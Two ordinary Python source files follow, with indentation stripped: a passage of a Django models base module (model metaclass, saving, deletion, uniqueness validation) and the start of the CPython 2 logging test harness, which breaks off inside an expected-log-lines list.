new_class = super_new(cls, name, bases, {'__module__': module})
attr_meta = attrs.pop('Meta', None)
abstract = getattr(attr_meta, 'abstract', False)
if not attr_meta:
meta = getattr(new_class, 'Meta', None)
else:
meta = attr_meta
base_meta = getattr(new_class, '_meta', None)
if getattr(meta, 'app_label', None) is None:
# Figure out the app_label by looking one level up.
# For 'django.contrib.sites.models', this would be 'sites'.
model_module = sys.modules[new_class.__module__]
try:
kwargs = {"app_label": model_module.__name__.split('.')[-2]}
except IndexError:
kwargs = {"app_label": 'Model'}
else:
kwargs = {}
new_class.add_to_class('_meta', Options(meta, **kwargs))
if not abstract:
new_class.add_to_class('DoesNotExist', subclass_exception('DoesNotExist',
tuple(x.DoesNotExist
for x in parents if hasattr(x, '_meta') and not x._meta.abstract)
or (ObjectDoesNotExist,), module))
new_class.add_to_class('MultipleObjectsReturned', subclass_exception('MultipleObjectsReturned',
tuple(x.MultipleObjectsReturned
for x in parents if hasattr(x, '_meta') and not x._meta.abstract)
or (MultipleObjectsReturned,), module))
if base_meta and not base_meta.abstract:
# Non-abstract child classes inherit some attributes from their
# non-abstract parent (unless an ABC comes before it in the
# method resolution order).
if not hasattr(meta, 'ordering'):
new_class._meta.ordering = base_meta.ordering
if not hasattr(meta, 'get_latest_by'):
new_class._meta.get_latest_by = base_meta.get_latest_by
is_proxy = new_class._meta.proxy
if getattr(new_class, '_default_manager', None):
if not is_proxy:
# Multi-table inheritance doesn't inherit default manager from
# parents.
new_class._default_manager = None
new_class._base_manager = None
else:
# Proxy classes do inherit parent's default manager, if none is
# set explicitly.
new_class._default_manager = new_class._default_manager._copy_to_model(new_class)
new_class._base_manager = new_class._base_manager._copy_to_model(new_class)
# Bail out early if we have already created this class.
m = get_model(new_class._meta.app_label, name, False)
if m is not None:
return m
# Add all attributes to the class.
for obj_name, obj in attrs.items():
new_class.add_to_class(obj_name, obj)
# All the fields of any type declared on this model
new_fields = new_class._meta.local_fields + \
new_class._meta.local_many_to_many + \
new_class._meta.virtual_fields
field_names = set([f.name for f in new_fields])
# Basic setup for proxy models.
if is_proxy:
base = None
for parent in [cls for cls in parents if hasattr(cls, '_meta')]:
if parent._meta.abstract:
if parent._meta.fields:
raise TypeError("Abstract base class containing model fields not permitted for proxy model '%s'." % name)
else:
continue
if base is not None:
raise TypeError("Proxy model '%s' has more than one non-abstract model base class." % name)
else:
base = parent
if base is None:
raise TypeError("Proxy model '%s' has no non-abstract model base class." % name)
if (new_class._meta.local_fields or
new_class._meta.local_many_to_many):
raise FieldError("Proxy model '%s' contains model fields." % name)
while base._meta.proxy:
base = base._meta.proxy_for_model
new_class._meta.setup_proxy(base)
# Do the appropriate setup for any model parents.
o2o_map = dict([(f.rel.to, f) for f in new_class._meta.local_fields
if isinstance(f, OneToOneField)])
for base in parents:
original_base = base
if not hasattr(base, '_meta'):
# Things without _meta aren't functional models, so they're
# uninteresting parents.
continue
parent_fields = base._meta.local_fields + base._meta.local_many_to_many
# Check for clashes between locally declared fields and those
# on the base classes (we cannot handle shadowed fields at the
# moment).
for field in parent_fields:
if field.name in field_names:
raise FieldError('Local field %r in class %r clashes '
'with field of similar name from '
'base class %r' %
(field.name, name, base.__name__))
if not base._meta.abstract:
# Concrete classes...
while base._meta.proxy:
# Skip over a proxy class to the "real" base it proxies.
base = base._meta.proxy_for_model
if base in o2o_map:
field = o2o_map[base]
elif not is_proxy:
attr_name = '%s_ptr' % base._meta.module_name
field = OneToOneField(base, name=attr_name,
auto_created=True, parent_link=True)
new_class.add_to_class(attr_name, field)
else:
field = None
new_class._meta.parents[base] = field
else:
# .. and abstract ones.
for field in parent_fields:
new_class.add_to_class(field.name, copy.deepcopy(field))
# Pass any non-abstract parent classes onto child.
new_class._meta.parents.update(base._meta.parents)
# Inherit managers from the abstract base classes.
new_class.copy_managers(base._meta.abstract_managers)
# Proxy models inherit the non-abstract managers from their base,
# unless they have redefined any of them.
if is_proxy:
new_class.copy_managers(original_base._meta.concrete_managers)
# Inherit virtual fields (like GenericForeignKey) from the parent
# class
for field in base._meta.virtual_fields:
if base._meta.abstract and field.name in field_names:
raise FieldError('Local field %r in class %r clashes '
'with field of similar name from '
'abstract base class %r' %
(field.name, name, base.__name__))
new_class.add_to_class(field.name, copy.deepcopy(field))
if abstract:
# Abstract base models can't be instantiated and don't appear in
# the list of models for an app. We do the final setup for them a
# little differently from normal models.
attr_meta.abstract = False
new_class.Meta = attr_meta
return new_class
new_class._prepare()
register_models(new_class._meta.app_label, new_class)
# Because of the way imports happen (recursively), we may or may not be
# the first time this model tries to register with the framework. There
# should only be one class for each model, so we always return the
# registered version.
return get_model(new_class._meta.app_label, name, False)
def copy_managers(cls, base_managers):
# This is in-place sorting of an Options attribute, but that's fine.
base_managers.sort()
for _, mgr_name, manager in base_managers:
val = getattr(cls, mgr_name, None)
if not val or val is manager:
new_manager = manager._copy_to_model(cls)
cls.add_to_class(mgr_name, new_manager)
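# add_to_class() below is the single installation point used throughout
# __new__: anything defining contribute_to_class() (fields, managers,
# Options) hooks itself onto the model class; plain attributes are set
# directly.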
def add_to_class(cls, name, value):
if hasattr(value, 'contribute_to_class'):
value.contribute_to_class(cls, name)
else:
setattr(cls, name, value)
def _prepare(cls):
"""
Creates some methods once self._meta has been populated.
"""
opts = cls._meta
opts._prepare(cls)
if opts.order_with_respect_to:
cls.get_next_in_order = curry(cls._get_next_or_previous_in_order, is_next=True)
cls.get_previous_in_order = curry(cls._get_next_or_previous_in_order, is_next=False)
# defer creating accessors on the foreign class until we are
# certain it has been created
def make_foreign_order_accessors(field, model, cls):
setattr(
field.rel.to,
'get_%s_order' % cls.__name__.lower(),
curry(method_get_order, cls)
)
setattr(
field.rel.to,
'set_%s_order' % cls.__name__.lower(),
curry(method_set_order, cls)
)
add_lazy_relation(
cls,
opts.order_with_respect_to,
opts.order_with_respect_to.rel.to,
make_foreign_order_accessors
)
# Give the class a docstring -- its definition.
if cls.__doc__ is None:
cls.__doc__ = "%s(%s)" % (cls.__name__, ", ".join([f.attname for f in opts.fields]))
if hasattr(cls, 'get_absolute_url'):
cls.get_absolute_url = update_wrapper(curry(get_absolute_url, opts, cls.get_absolute_url),
cls.get_absolute_url)
signals.class_prepared.send(sender=cls)
class ModelState(object):
"""
A class for storing instance state
"""
def __init__(self, db=None):
self.db = db
# If true, uniqueness validation checks will consider this a new, as-yet-unsaved object.
# Necessary for correct validation of new instances of objects with explicit (non-auto) PKs.
# This impacts validation only; it has no effect on the actual save.
self.adding = True
class Model(object):
__metaclass__ = ModelBase
_deferred = False
def __init__(self, *args, **kwargs):
self._entity_exists = kwargs.pop('__entity_exists', False)
signals.pre_init.send(sender=self.__class__, args=args, kwargs=kwargs)
# Set up the storage for instance state
self._state = ModelState()
# There is a rather weird disparity here: if kwargs are given, a value is
# set from them, then args override it. It should be one or the other;
# don't duplicate the work. The reason for the kwargs check is that the
# standard iterator passes values in by args, and instantiation for
# iteration is 33% faster that way.
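# For example (hypothetical model): SomeModel(1, 2) takes the fast
# positional path below, while SomeModel(a=1, b=2) takes the slower
# kwargs-aware path.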
args_len = len(args)
if args_len > len(self._meta.fields):
# Daft, but matches old exception sans the err msg.
raise IndexError("Number of args exceeds number of fields")
fields_iter = iter(self._meta.fields)
if not kwargs:
# The ordering of the izip calls matter - izip throws StopIteration
# when an iter throws it. So if the first iter throws it, the second
# is *not* consumed. We rely on this, so don't change the order
# without changing the logic.
for val, field in izip(args, fields_iter):
setattr(self, field.attname, val)
else:
# Slower, kwargs-ready version.
for val, field in izip(args, fields_iter):
setattr(self, field.attname, val)
kwargs.pop(field.name, None)
# Maintain compatibility with existing calls.
if isinstance(field.rel, ManyToOneRel):
kwargs.pop(field.attname, None)
# Now we're left with the unprocessed fields that *must* come from
# keywords, or default.
for field in fields_iter:
is_related_object = False
# This slightly odd construct is so that we can access any
# data-descriptor object (DeferredAttribute) without triggering its
# __get__ method.
if (field.attname not in kwargs and
isinstance(self.__class__.__dict__.get(field.attname), DeferredAttribute)):
# This field will be populated on request.
continue
if kwargs:
if isinstance(field.rel, ManyToOneRel):
try:
# Assume object instance was passed in.
rel_obj = kwargs.pop(field.name)
is_related_object = True
except KeyError:
try:
# Object instance wasn't passed in -- must be an ID.
val = kwargs.pop(field.attname)
except KeyError:
val = field.get_default()
else:
# Object instance was passed in. Special case: You can
# pass in "None" for related objects if it's allowed.
if rel_obj is None and field.null:
val = None
else:
try:
val = kwargs.pop(field.attname)
except KeyError:
# This is done with an exception rather than the
# default argument on pop because we don't want
# get_default() to be evaluated, and then not used.
# Refs #12057.
val = field.get_default()
else:
val = field.get_default()
if is_related_object:
# If we are passed a related instance, set it using the
# field.name instead of field.attname (e.g. "user" instead of
# "user_id") so that the object gets properly cached (and type
# checked) by the RelatedObjectDescriptor.
setattr(self, field.name, rel_obj)
else:
setattr(self, field.attname, val)
if kwargs:
for prop in kwargs.keys():
try:
if isinstance(getattr(self.__class__, prop), property):
setattr(self, prop, kwargs.pop(prop))
except AttributeError:
pass
if kwargs:
raise TypeError("'%s' is an invalid keyword argument for this function" % kwargs.keys()[0])
self._original_pk = self.pk if self._meta.pk is not None else None
super(Model, self).__init__()
signals.post_init.send(sender=self.__class__, instance=self)
def __repr__(self):
try:
u = unicode(self)
except (UnicodeEncodeError, UnicodeDecodeError):
u = '[Bad Unicode data]'
return smart_str(u'<%s: %s>' % (self.__class__.__name__, u))
def __str__(self):
if hasattr(self, '__unicode__'):
return force_unicode(self).encode('utf-8')
return '%s object' % self.__class__.__name__
def __eq__(self, other):
return isinstance(other, self.__class__) and self._get_pk_val() == other._get_pk_val()
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self._get_pk_val())
def __reduce__(self):
"""
Provide pickling support. Normally, this just dispatches to Python's
standard handling. However, for models with deferred field loading, we
need to do things manually, as they're dynamically created classes and
only module-level classes can be pickled by the default path.
"""
data = self.__dict__
model = self.__class__
# The obvious thing to do here is to invoke super().__reduce__()
# for the non-deferred case. Don't do that.
# On Python 2.4, there is something weird with __reduce__,
# and as a result, the super call will cause an infinite recursion.
# See #10547 and #12121.
defers = []
pk_val = None
if self._deferred:
from django.db.models.query_utils import deferred_class_factory
factory = deferred_class_factory
for field in self._meta.fields:
if isinstance(self.__class__.__dict__.get(field.attname),
DeferredAttribute):
defers.append(field.attname)
if pk_val is None:
# The pk_val and model values are the same for all
# DeferredAttribute classes, so we only need to do this
# once.
obj = self.__class__.__dict__[field.attname]
model = obj.model_ref()
else:
factory = simple_class_factory
return (model_unpickle, (model, defers, factory), data)
def _get_pk_val(self, meta=None):
if not meta:
meta = self._meta
return getattr(self, meta.pk.attname)
def _set_pk_val(self, value):
return setattr(self, self._meta.pk.attname, value)
pk = property(_get_pk_val, _set_pk_val)
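# e.g. instance.pk reads and writes the attribute named by
# self._meta.pk.attname (commonly "id").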
def serializable_value(self, field_name):
"""
Returns the value of the field name for this instance. If the field is
a foreign key, returns the id value, instead of the object. If there's
no Field object with this name on the model, the model attribute's
value is returned directly.
Used to serialize a field's value (in the serializer, or form output,
for example). Normally, you would just access the attribute directly
and not use this method.
"""
try:
field = self._meta.get_field_by_name(field_name)[0]
except FieldDoesNotExist:
return getattr(self, field_name)
return getattr(self, field.attname)
def save(self, force_insert=False, force_update=False, using=None):
"""
Saves the current instance. Override this in a subclass if you want to
control the saving process.
The 'force_insert' and 'force_update' parameters can be used to insist
that the "save" must be an SQL insert or update (or equivalent for
non-SQL backends), respectively. Normally, they should not be set.
"""
if force_insert and force_update:
raise ValueError("Cannot force both insert and updating in model saving.")
self.save_base(using=using, force_insert=force_insert, force_update=force_update)
save.alters_data = True
def save_base(self, raw=False, cls=None, origin=None, force_insert=False,
force_update=False, using=None):
"""
Does the heavy-lifting involved in saving. Subclasses shouldn't need to
override this method. It's separate from save() in order to hide the
need for overrides of save() to pass around internal-only parameters
('raw', 'cls', and 'origin').
"""
using = using or router.db_for_write(self.__class__, instance=self)
entity_exists = bool(self._entity_exists and self._original_pk == self.pk)
connection = connections[using]
assert not (force_insert and force_update)
if cls is None:
cls = self.__class__
meta = cls._meta
if not meta.proxy:
origin = cls
else:
meta = cls._meta
if origin and not meta.auto_created:
signals.pre_save.send(sender=origin, instance=self, raw=raw, using=using)
# If we are in a raw save, save the object exactly as presented.
# That means that we don't try to be smart about saving attributes
# that might have come from the parent class - we just save the
# attributes we have been given to the class we have been given.
# We also go through this process to defer the save of proxy objects
# to their actual underlying model.
if not raw or meta.proxy:
if meta.proxy:
org = cls
else:
org = None
for parent, field in meta.parents.items():
# At this point, the parent's primary key field may be unknown
# (for example, when saving from an admin form that doesn't fill
# in this field). If so, fill it in.
if field and getattr(self, parent._meta.pk.attname) is None and getattr(self, field.attname) is not None:
setattr(self, parent._meta.pk.attname, getattr(self, field.attname))
self.save_base(cls=parent, origin=org, using=using)
if field:
setattr(self, field.attname, self._get_pk_val(parent._meta))
if meta.proxy:
return
if not meta.proxy:
non_pks = [f for f in meta.local_fields if not f.primary_key]
# First, try an UPDATE. If that doesn't update anything, do an INSERT.
pk_val = self._get_pk_val(meta)
pk_set = pk_val is not None
record_exists = True
manager = cls._base_manager
# TODO/NONREL: Some backends could emulate force_insert/_update
# with an optimistic transaction, but since it's costly we should
# only do it when the user explicitly wants it.
# By adding support for an optimistic locking transaction
# in Django (SQL: SELECT ... FOR UPDATE) we could even make that
# part fully reusable on all backends (the current .exists()
# check below isn't really safe if you have lots of concurrent
# requests; neither, for that matter, is QuerySet.get_or_create).
try_update = connection.features.distinguishes_insert_from_update
if not try_update:
record_exists = False
if try_update and pk_set:
# Determine whether a record with the primary key already exists.
if (force_update or (not force_insert and
manager.using(using).filter(pk=pk_val).exists())):
# It does already exist, so do an UPDATE.
if force_update or non_pks:
values = [(f, None, (raw and getattr(self, f.attname) or f.pre_save(self, False))) for f in non_pks]
rows = manager.using(using).filter(pk=pk_val)._update(values)
if force_update and not rows:
raise DatabaseError("Forced update did not affect any rows.")
else:
record_exists = False
if not pk_set or not record_exists:
if meta.order_with_respect_to:
# If this is a model with an order_with_respect_to
# autopopulate the _order field
field = meta.order_with_respect_to
order_value = manager.using(using).filter(**{field.name: getattr(self, field.attname)}).count()
self._order = order_value
if connection.features.distinguishes_insert_from_update:
add = True
else:
add = not entity_exists
if not pk_set:
if force_update:
raise ValueError("Cannot force an update in save() with no primary key.")
values = [(f, f.get_db_prep_save(raw and getattr(self, f.attname) or f.pre_save(self, add), connection=connection))
for f in meta.local_fields if not isinstance(f, AutoField)]
else:
values = [(f, f.get_db_prep_save(raw and getattr(self, f.attname) or f.pre_save(self, add), connection=connection))
for f in meta.local_fields]
record_exists = False
update_pk = bool(meta.has_auto_field and not pk_set)
if values:
# Create a new record.
result = manager._insert(values, return_id=update_pk, using=using)
else:
# Create a new record with defaults for everything.
result = manager._insert([(meta.pk, connection.ops.pk_default_value())], return_id=update_pk, raw_values=True, using=using)
if update_pk:
setattr(self, meta.pk.attname, result)
transaction.commit_unless_managed(using=using)
# Store the database on which the object was saved
self._state.db = using
# Once saved, this is no longer a to-be-added instance.
self._state.adding = False
# Signal that the save is complete
if origin and not meta.auto_created:
if connection.features.distinguishes_insert_from_update:
created = not record_exists
else:
created = not entity_exists
signals.post_save.send(sender=origin, instance=self,
created=created, raw=raw, using=using)
self._entity_exists = True
self._original_pk = self.pk
save_base.alters_data = True
def delete(self, using=None):
using = using or router.db_for_write(self.__class__, instance=self)
assert self._get_pk_val() is not None, "%s object can't be deleted because its %s attribute is set to None." % (self._meta.object_name, self._meta.pk.attname)
collector = Collector(using=using)
collector.collect([self])
collector.delete()
self._entity_exists = False
self._original_pk = None
delete.alters_data = True
def _get_FIELD_display(self, field):
value = getattr(self, field.attname)
return force_unicode(dict(field.flatchoices).get(value, value), strings_only=True)
def _get_next_or_previous_by_FIELD(self, field, is_next, **kwargs):
if not self.pk:
raise ValueError("get_next/get_previous cannot be used on unsaved objects.")
op = is_next and 'gt' or 'lt'
order = not is_next and '-' or ''
param = smart_str(getattr(self, field.attname))
q = Q(**{'%s__%s' % (field.name, op): param})
q = q | Q(**{field.name: param, 'pk__%s' % op: self.pk})
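# The second Q breaks ties: rows whose field value equals this one are
# ordered and filtered by primary key, making the traversal deterministic.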
qs = self.__class__._default_manager.using(self._state.db).filter(**kwargs).filter(q).order_by('%s%s' % (order, field.name), '%spk' % order)
try:
return qs[0]
except IndexError:
raise self.DoesNotExist("%s matching query does not exist." % self.__class__._meta.object_name)
def _get_next_or_previous_in_order(self, is_next):
cachename = "__%s_order_cache" % is_next
if not hasattr(self, cachename):
op = is_next and 'gt' or 'lt'
order = not is_next and '-_order' or '_order'
order_field = self._meta.order_with_respect_to
obj = self._default_manager.filter(**{
order_field.name: getattr(self, order_field.attname)
}).filter(**{
'_order__%s' % op: self._default_manager.values('_order').filter(**{
self._meta.pk.name: self.pk
})
}).order_by(order)[:1].get()
setattr(self, cachename, obj)
return getattr(self, cachename)
def prepare_database_save(self, unused):
return self.pk
def clean(self):
"""
Hook for doing any extra model-wide validation after clean() has been
called on every field by self.clean_fields. Any ValidationError raised
by this method will not be associated with a particular field; it will
have a special-case association with the field defined by NON_FIELD_ERRORS.
"""
pass
def validate_unique(self, exclude=None):
"""
Checks unique constraints on the model and raises ``ValidationError``
if any failed.
"""
unique_checks, date_checks = self._get_unique_checks(exclude=exclude)
errors = self._perform_unique_checks(unique_checks)
date_errors = self._perform_date_checks(date_checks)
for k, v in date_errors.items():
errors.setdefault(k, []).extend(v)
if errors:
raise ValidationError(errors)
def _get_unique_checks(self, exclude=None):
"""
Gather a list of checks to perform. Since validate_unique could be
called from a ModelForm, some fields may have been excluded; we can't
perform a unique check on a model that is missing fields involved
in that check.
Fields that did not validate should also be excluded, but they need
to be passed in via the exclude argument.
"""
if exclude is None:
exclude = []
unique_checks = []
unique_togethers = [(self.__class__, self._meta.unique_together)]
for parent_class in self._meta.parents.keys():
if parent_class._meta.unique_together:
unique_togethers.append((parent_class, parent_class._meta.unique_together))
for model_class, unique_together in unique_togethers:
for check in unique_together:
for name in check:
# If this is an excluded field, don't add this check.
if name in exclude:
break
else:
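# for/else: this branch runs only when the loop above did not
# break, i.e. when no field in this check was excluded.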
unique_checks.append((model_class, tuple(check)))
# These are checks for the unique_for_<date/year/month>.
date_checks = []
# Gather a list of checks for fields declared as unique and add them to
# the list of checks.
fields_with_class = [(self.__class__, self._meta.local_fields)]
for parent_class in self._meta.parents.keys():
fields_with_class.append((parent_class, parent_class._meta.local_fields))
for model_class, fields in fields_with_class:
for f in fields:
name = f.name
if name in exclude:
continue
if f.unique:
unique_checks.append((model_class, (name,)))
if f.unique_for_date and f.unique_for_date not in exclude:
date_checks.append((model_class, 'date', name, f.unique_for_date))
if f.unique_for_year and f.unique_for_year not in exclude:
date_checks.append((model_class, 'year', name, f.unique_for_year))
if f.unique_for_month and f.unique_for_month not in exclude:
date_checks.append((model_class, 'month', name, f.unique_for_month))
return unique_checks, date_checks
def _perform_unique_checks(self, unique_checks):
errors = {}
for model_class, unique_check in unique_checks:
# Try to look up an existing object with the same values as this
# object's values for all the unique field.
lookup_kwargs = {}
for field_name in unique_check:
f = self._meta.get_field(field_name)
lookup_value = getattr(self, f.attname)
if lookup_value is None:
# no value, skip the lookup
continue
if f.primary_key and not self._state.adding:
# no need to check for unique primary key when editing
continue
lookup_kwargs[str(field_name)] = lookup_value
# some fields were skipped, no reason to do the check
if len(unique_check) != len(lookup_kwargs.keys()):
continue
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
if not self._state.adding and self.pk is not None:
qs = qs.exclude(pk=self.pk)
if qs.exists():
if len(unique_check) == 1:
key = unique_check[0]
else:
key = NON_FIELD_ERRORS
errors.setdefault(key, []).append(self.unique_error_message(model_class, unique_check))
return errors
def _perform_date_checks(self, date_checks):
errors = {}
for model_class, lookup_type, field, unique_for in date_checks:
lookup_kwargs = {}
# There's a ticket to add a date lookup; we can remove this special
# case if that makes its way in.
date = getattr(self, unique_for)
if date is None:
continue
if lookup_type == 'date':
lookup_kwargs['%s__day' % unique_for] = date.day
lookup_kwargs['%s__month' % unique_for] = date.month
lookup_kwargs['%s__year' % unique_for] = date.year
else:
lookup_kwargs['%s__%s' % (unique_for, lookup_type)] = getattr(date, lookup_type)
lookup_kwargs[field] = getattr(self, field)
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
if not self._state.adding and self.pk is not None:
qs = qs.exclude(pk=self.pk)
if qs.exists():
errors.setdefault(field, []).append(
self.date_error_message(lookup_type, field, unique_for)
)
return errors
def date_error_message(self, lookup_type, field, unique_for):
opts = self._meta
return _(u"%(field_name)s must be unique for %(date_field)s %(lookup)s.") % {
'field_name': unicode(capfirst(opts.get_field(field).verbose_name)),
'date_field': unicode(capfirst(opts.get_field(unique_for).verbose_name)),
'lookup': lookup_type,
}
def unique_error_message(self, model_class, unique_check):
opts = model_class._meta
model_name = capfirst(opts.verbose_name)
# A unique field
if len(unique_check) == 1:
field_name = unique_check[0]
field_label = capfirst(opts.get_field(field_name).verbose_name)
# Insert the error into the error dict, very sneaky
return _(u"%(model_name)s with this %(field_label)s already exists.") % {
'model_name': unicode(model_name),
'field_label': unicode(field_label)
}
# unique_together
else:
field_labels = map(lambda f: capfirst(opts.get_field(f).verbose_name), unique_check)
field_labels = get_text_list(field_labels, _('and'))
return _(u"%(model_name)s with this %(field_label)s already exists.") % {
'model_name': unicode(model_name),
'field_label': unicode(field_labels)
}
def full_clean(self, exclude=None):
"""
Calls clean_fields, clean, and validate_unique on the model,
and raises a ``ValidationError`` for any errors that occurred.
"""
errors = {}
if exclude is None:
exclude = []
try:
self.clean_fields(exclude=exclude)
except ValidationError, e:
errors = e.update_error_dict(errors)
# Form.clean() is run even if other validation fails, so do the
# same with Model.clean() for consistency.
try:
self.clean()
except ValidationError, e:
errors = e.update_error_dict(errors)
# Run unique checks, but only for fields that passed validation.
for name in errors.keys():
if name != NON_FIELD_ERRORS and name not in exclude:
exclude.append(name)
try:
self.validate_unique(exclude=exclude)
except ValidationError, e:
errors = e.update_error_dict(errors)
if errors:
raise ValidationError(errors)
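# A rough usage sketch (ModelForm validation does approximately this):
#     try:
#         instance.full_clean()
#     except ValidationError, e:
#         errors = e.message_dict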
def clean_fields(self, exclude=None):
"""
Cleans all fields and raises a ValidationError containing message_dict
of all validation errors if any occur.
"""
if exclude is None:
exclude = []
errors = {}
for f in self._meta.fields:
if f.name in exclude:
continue
# Skip validation for empty fields with blank=True. The developer
# is responsible for making sure they have a valid value.
raw_value = getattr(self, f.attname)
if f.blank and raw_value in validators.EMPTY_VALUES:
continue
try:
setattr(self, f.attname, f.clean(raw_value, self))
except ValidationError, e:
errors[f.name] = e.messages
if errors:
raise ValidationError(errors)
############################################
# HELPER FUNCTIONS (CURRIED MODEL METHODS) #
############################################
# ORDERING METHODS #########################
def method_set_order(ordered_obj, self, id_list, using=None):
if using is None:
using = DEFAULT_DB_ALIAS
rel_val = getattr(self, ordered_obj._meta.order_with_respect_to.rel.field_name)
order_name = ordered_obj._meta.order_with_respect_to.name
# FIXME: It would be nice if there was an "update many" version of update
# for situations like this.
for i, j in enumerate(id_list):
ordered_obj.objects.filter(**{'pk': j, order_name: rel_val}).update(_order=i)
transaction.commit_unless_managed(using=using)
def method_get_order(ordered_obj, self):
rel_val = getattr(self, ordered_obj._meta.order_with_respect_to.rel.field_name)
order_name = ordered_obj._meta.order_with_respect_to.name
pk_name = ordered_obj._meta.pk.name
return [r[pk_name] for r in
ordered_obj.objects.filter(**{order_name: rel_val}).values(pk_name)]
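# ModelBase._prepare() curries these two functions into
# get_<model>_order()/set_<model>_order() accessors on the related model
# (see make_foreign_order_accessors above).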
##############################################
# HELPER FUNCTIONS (CURRIED MODEL FUNCTIONS) #
##############################################
def get_absolute_url(opts, func, self, *args, **kwargs):
return settings.ABSOLUTE_URL_OVERRIDES.get('%s.%s' % (opts.app_label, opts.module_name), func)(self, *args, **kwargs)
########
# MISC #
########
class Empty(object):
pass
def simple_class_factory(model, attrs):
"""Used to unpickle Models without deferred fields.
We need to do this the hard way, rather than just using
the default __reduce__ implementation, because of a
__deepcopy__ problem in Python 2.4
"""
return model
def model_unpickle(model, attrs, factory):
"""
Used to unpickle Model subclasses with deferred fields.
"""
cls = factory(model, attrs)
return cls.__new__(cls)
model_unpickle.__safe_for_unpickle__ = True
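# model_unpickle() is the counterpart of Model.__reduce__ above, which
# returns (model_unpickle, (model, defers, factory), data); unpickling
# rebuilds the (possibly deferred) class before instance state is restored.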
if sys.version_info < (2, 5):
# Prior to Python 2.5, Exception was an old-style class
def subclass_exception(name, parents, unused):
return types.ClassType(name, parents, {})
else:
def subclass_exception(name, parents, module):
return type(name, parents, {'__module__': module})
|
|
#!/usr/bin/env python
#
# Copyright 2001-2012 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2012 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import cPickle
import cStringIO
import gc
import json
import os
import random
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
logging.getLogger("\xab\xd7\xbb")
logging.getLogger(u"\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = cStringIO.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
